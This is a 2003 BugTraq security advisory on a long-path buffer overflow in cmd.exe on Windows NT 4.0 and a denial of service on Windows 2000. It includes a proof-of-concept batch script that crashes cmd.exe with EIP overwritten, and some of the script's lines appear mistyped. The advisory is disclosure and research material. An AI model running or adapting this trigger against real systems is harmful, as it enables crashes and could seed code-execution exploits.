BugTraq
SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS Feb 11 2003 10:15AM
3APA3A (3APA3A SECURITY NNOV RU)

Title: Buffer overflow/DoS against cmd.exe
for Windows NT 4.0/2000
Affected: Microsoft Windows NT 4.0 (buffer overflow)
Microsoft Windows 2000 (DoS)
Vendor: Microsoft
Risk: Average for Windows NT 4.0
Low for Windows 2000
Exploitable: Yes
Remote: No
Vendor Notified: January, 30 2003

I. Intro

cmd.exe is Windows NT OS family command processor. It's also used to
process .bat and .cmd batch files. Many system administrator run batch
files with elevated privileges for system maintenance.

II. Vulnerability

cmd.exe has a flow in processing cd command on long path name. On
Windows NT 4.0 it may cause buffer overflow, on Windows 2000 - failure
of batch file processing.

III. Details

NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used
for filename. This is documented feature of Windows API.

cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if
destination path is longer than 256 characters. This vulnerability may
be trivially exploited to execute code.

cmd.exe from Windows 2000 has no buffer overflow, but than changing to
directory with a path slightly longer than 256 characters (for example
260 characters) cmd.exe becomes "jailed" in this directory, it means cd
.. command will fail. It may cause DoS against maintenance batch script.

IV. Exploitation

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%c:
cd cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd ..

creates directory with 2 subdirectory. First one demonstrates buffer
overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash
cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change
directory to AA...\BB..., but cd .. command will fail.

V. Vendor

Microsoft acknowledged problem.

--
http://www.security.nnov.ru
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus